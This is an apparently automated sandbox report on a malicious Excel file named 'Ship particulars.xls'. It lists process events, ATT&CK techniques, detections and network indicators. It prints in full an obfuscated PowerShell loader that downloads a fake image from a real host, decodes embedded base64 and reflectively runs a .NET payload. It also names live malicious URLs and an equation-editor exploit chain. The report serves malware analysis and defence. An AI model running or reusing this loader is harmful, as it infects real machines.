    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Ship particulars.xlsStream path 'MBD0026D144/Package' entropy: 7.9786395883 (max. 8.0)
    Source: Ship particulars.xlsStream path 'Workbook' entropy: 7.99706828447 (max. 8.0)
    Source: ~DFA3F86C325C272D08.TMP.0.drStream path 'Package' entropy: 7.9702834436 (max. 8.0)
    Source: 92530000.0.drStream path 'MBD0026D144/Package' entropy: 7.9702834436 (max. 8.0)
    Source: 92530000.0.drStream path 'Workbook' entropy: 7.99840003622 (max. 8.0)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 995Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2276Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3296Thread sleep time: -180000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exe TID: 3392Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3564Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3496Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05F4 mov edx, dword ptr fs:[00000030h]9_2_035B05F4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.29 80Jump to behavior
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTR
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('sevlink = 8zkhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358zk; sevwebclient = new-object system.net.webclient; try { sevdownloadeddata = sevwebclient.downloaddata(sevlink) } catch { write-host 8zkfailed to download data from sev'+'link'+'8zk -foregroundcolor red; exit }; i'+'f'+' (sevdownloadeddata -ne sevnull) { sevimagetext = [system.text.encoding'+']::utf8.getstring(sevdownloadeddata); sevstartflag = 8zk<<base64_start>>8zk; sevendflag = 8zk<<base64_end>>8zk; sevstartindex = sevimagetext.indexof(sevstartflag); sevendindex = sevimagetext.indexof(sevendflag); if (sevstartindex -ge 0 -and sevendi'+'ndex -gt sevsta'+'rtindex) { sevs'+'tar'+'tindex += sevstartflag.length; sev'+'ba'+'se64l'+'ength = sevendinde'+'x - sevstartindex; sevba'+'se64command = sevimagetext.substring(sevstartindex, sevbase64length); sevcommandbytes = [system.convert]::frombase64string(sevbase64command); sevloadedassembly = [system.reflection.a'+'ssembly]::load(sevcommandbytes); sevtyp'+'e = sevloadedassembly.gettyp'+'e(8zkrunpe.home8zk); sevmethod = sevtype.ge'+'tmethod(8zkvai8zk).invoke(sevnull, [object[]] '+'(8zktxt.sero/44133/931.871.64.891//:ptth8zk , 8zkd'+'esativado8zk , 8zkdesativado8zk , 8zk'+'desativado8zk,8zkregasm8zk,8zk8zk)) } }').replace('8zk',[string][char]39).replace(([char]83+[char]101+[char]86),[string][char]36)| &( $pshome[4]+$pshome[34]+'x')"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('sevlink = 8zkhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358zk; sevwebclient = new-object system.net.webclient; try { sevdownloadeddata = sevwebclient.downloaddata(sevlink) } catch { write-host 8zkfailed to download data from sev'+'link'+'8zk -foregroundcolor red; exit }; i'+'f'+' (sevdownloadeddata -ne sevnull) { sevimagetext = [system.text.encoding'+']::utf8.getstring(sevdownloadeddata); sevstartflag = 8zk<<base64_start>>8zk; sevendflag = 8zk<<base64_end>>8zk; sevstartindex = sevimagetext.indexof(sevstartflag); sevendindex = sevimagetext.indexof(sevendflag); if (sevstartindex -ge 0 -and sevendi'+'ndex -gt sevsta'+'rtindex) { sevs'+'tar'+'tindex += sevstartflag.length; sev'+'ba'+'se64l'+'ength = sevendinde'+'x - sevstartindex; sevba'+'se64command = sevimagetext.substring(sevstartindex, sevbase64length); sevcommandbytes = [system.convert]::frombase64string(sevbase64command); sevloadedassembly = [system.reflection.a'+'ssembly]::load(sevcommandbytes); sevtyp'+'e = sevloadedassembly.gettyp'+'e(8zkrunpe.home8zk); sevmethod = sevtype.ge'+'tmethod(8zkvai8zk).invoke(sevnull, [object[]] '+'(8zktxt.sero/44133/931.871.64.891//:ptth8zk , 8zkd'+'esativado8zk , 8zkdesativado8zk , 8zk'+'desativado8zk,8zkregasm8zk,8zk8zk)) } }').replace('8zk',[string][char]39).replace(([char]83+[char]101+[char]86),[string][char]36)| &( $pshome[4]+$pshome[34]+'x')"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information221
    Scripting
    Valid Accounts11
    Command and Scripting Interpreter
    1
    Browser Extensions
    111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts43
    Exploitation for Client Execution
    221
    Scripting
    1
    DLL Side-Loading
    1
    Modify Registry
    LSASS Memory21
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media23
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    PowerShell
    1
    DLL Side-Loading
    Logon Script (Windows)21
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
    Process Injection
    NTDS1
    Remote System Discovery
    Distributed Component Object ModelInput Capture13
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
    Obfuscated Files or Information
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Install Root Certificate
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467087 Sample: Ship particulars.xls Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 40 hop.fyi 2->40 52 Snort IDS alert for network traffic 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 20 other signatures 2->58 8 EXCEL.EXE 57 51 2->8         started        signatures3 process4 dnsIp5 44 hop.fyi 192.185.89.92, 49163, 49165, 49166 UNIFIEDLAYER-AS-1US United States 8->44 46 198.46.178.139, 49164, 49167, 49171 AS-COLOCROSSINGUS United States 8->46 28 C:\Users\user\...\Ship particulars.xls (copy), Composite 8->28 dropped 30 C:\Users\user\...\uh.uh.uhuhuh.uu.uh[1].doc, Rich 8->30 dropped 12 WINWORD.EXE 346 41 8->12         started        17 wscript.exe 1 8->17         started        file6 process7 dnsIp8 48 hop.fyi 12->48 32 C:\Users\user\AppData\Roaming\...\sWel7.url, MS 12->32 dropped 34 C:\Users\user\AppData\Roaming\...\hop.fyi.url, MS 12->34 dropped 36 ~WRF{45674ED6-0137...9-56BDBC83CE0D}.tmp, Composite 12->36 dropped 38 C:\Users\user\AppData\Local\...\4924813.doc, Rich 12->38 dropped 66 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->66 68 Office viewer loads remote template 12->68 70 Microsoft Office drops suspicious files 12->70 19 EQNEDT32.EXE 12 12->19         started        50 91.92.254.29, 49173, 80 THEZONEBG Bulgaria 17->50 72 System process connects to network (likely due to code injection or exploit) 17->72 74 Suspicious powershell command line found 17->74 76 Wscript starts Powershell (via cmd or directly) 17->76 78 3 other signatures 17->78 23 powershell.exe 12 4 17->23         started        file9 signatures10 process11 dnsIp12 26 C:\...\creatingfollowerswithflowerese.vBS, Unicode 19->26 dropped 60 Office equation editor establishes network connection 19->60 62 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->62 42 uploaddeimagens.com.br 188.114.96.3, 443, 49174 CLOUDFLARENETUS European Union 23->42 64 Installs new ROOT certificates 23->64 file13 signatures14

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Ship particulars.xls21%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
    Ship particulars.xls100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc100%AviraHEUR/Rtf.Malformed
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{45674ED6-0137-4508-99E9-56BDBC83CE0D}.tmp100%AviraEXP/CVE-2017-11882.Gen
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc100%AviraHEUR/Rtf.Malformed
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://crl.entrust.net/server1.crl00%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://secure.comodo.com/CPS00%URL Reputationsafe
    https://uploaddeimagens.com.br/i0%Avira URL Cloudsafe
    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK;100%Avira URL Cloudmalware
    http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gif0%Avira URL Cloudsafe
    http://198.46.178.139/33144/ee/uh.uh.uhuhuh.uu.uh.doc0%Avira URL Cloudsafe
    http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifM0%Avira URL Cloudsafe
    http://uploaddeimagens.com.br0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
    http://go.micros0%Avira URL Cloudsafe
    http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt100%Avira URL Cloudmalware
    https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
    http://hop.fyi/sWel70%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
    https://uploaddeimagens.com.br0%Avira URL Cloudsafe
    http://hop.fyi/sWel7yX0%Avira URL Cloudsafe
    http://hop.fyi/0%Avira URL Cloudsafe
    http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifj0%Avira URL Cloudsafe
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p100%Avira URL Cloudmalware
    https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    hop.fyi
    192.185.89.92
    truetrue
      unknown
      uploaddeimagens.com.br
      188.114.96.3
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.giftrue
        • Avira URL Cloud: safe
        unknown
        http://198.46.178.139/33144/ee/uh.uh.uhuhuh.uu.uh.doctrue
        • Avira URL Cloud: safe
        unknown
        http://hop.fyi/sWel7false
        • Avira URL Cloud: safe
        unknown
        https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235false
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.entrust.net/server1.crl0powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK;powershell.exe, 0000000C.00000002.429913988.00000000024A9000.00000004.00000800.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://ocsp.entrust.net03powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://uploaddeimagens.com.br/ipowershell.exe, 0000000C.00000002.429760140.0000000000700000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifMEQNEDT32.EXE, 00000009.00000002.416768338.000000000053E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://uploaddeimagens.com.brpowershell.exe, 0000000C.00000002.429913988.0000000002E95000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txtwscript.exe, 0000000A.00000002.431883950.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431709311.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431533301.0000000000546000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.431803798.0000000000548000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431579559.000000000051D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.0000000000546000.00000004.00000020.00020000.00000000.sdmp, creatingfollowerswithflowereseverytime[1].gif.9.dr, creatingfollowerswithflowerese.vBS.9.drtrue
        • Avira URL Cloud: malware
        unknown
        http://go.microspowershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://www.cloudflare.com/5xx-error-landingpowershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235ppowershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        https://uploaddeimagens.com.brpowershell.exe, 0000000C.00000002.429913988.0000000002E8C000.00000004.00000800.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://hop.fyi/hop.fyi.url.3.drfalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://hop.fyi/sWel7yX92530000.0.dr, ~DF8FA74BFE73643F78.TMP.0.drfalse
        • Avira URL Cloud: safe
        unknown
        http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifjEQNEDT32.EXE, 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://ocsp.entrust.net0Dpowershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://secure.comodo.com/CPS0powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        192.185.89.92
        hop.fyiUnited States
        46606UNIFIEDLAYER-AS-1UStrue
        91.92.254.29
        unknownBulgaria
        34368THEZONEBGtrue
        198.46.178.139
        unknownUnited States
        36352AS-COLOCROSSINGUStrue
        188.114.96.3
        uploaddeimagens.com.brEuropean Union
        13335CLOUDFLARENETUStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1467087
        Start date and time:2024-07-03 17:57:33 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 1s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:16
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:Ship particulars.xls
        Detection:MAL
        Classification:mal100.expl.evad.winXLS@7/34@13/4
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 92%
        • Number of executed functions: 14
        • Number of non-executed functions: 3
        Cookbook Comments:
        • Found application associated with file extension: .xls
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
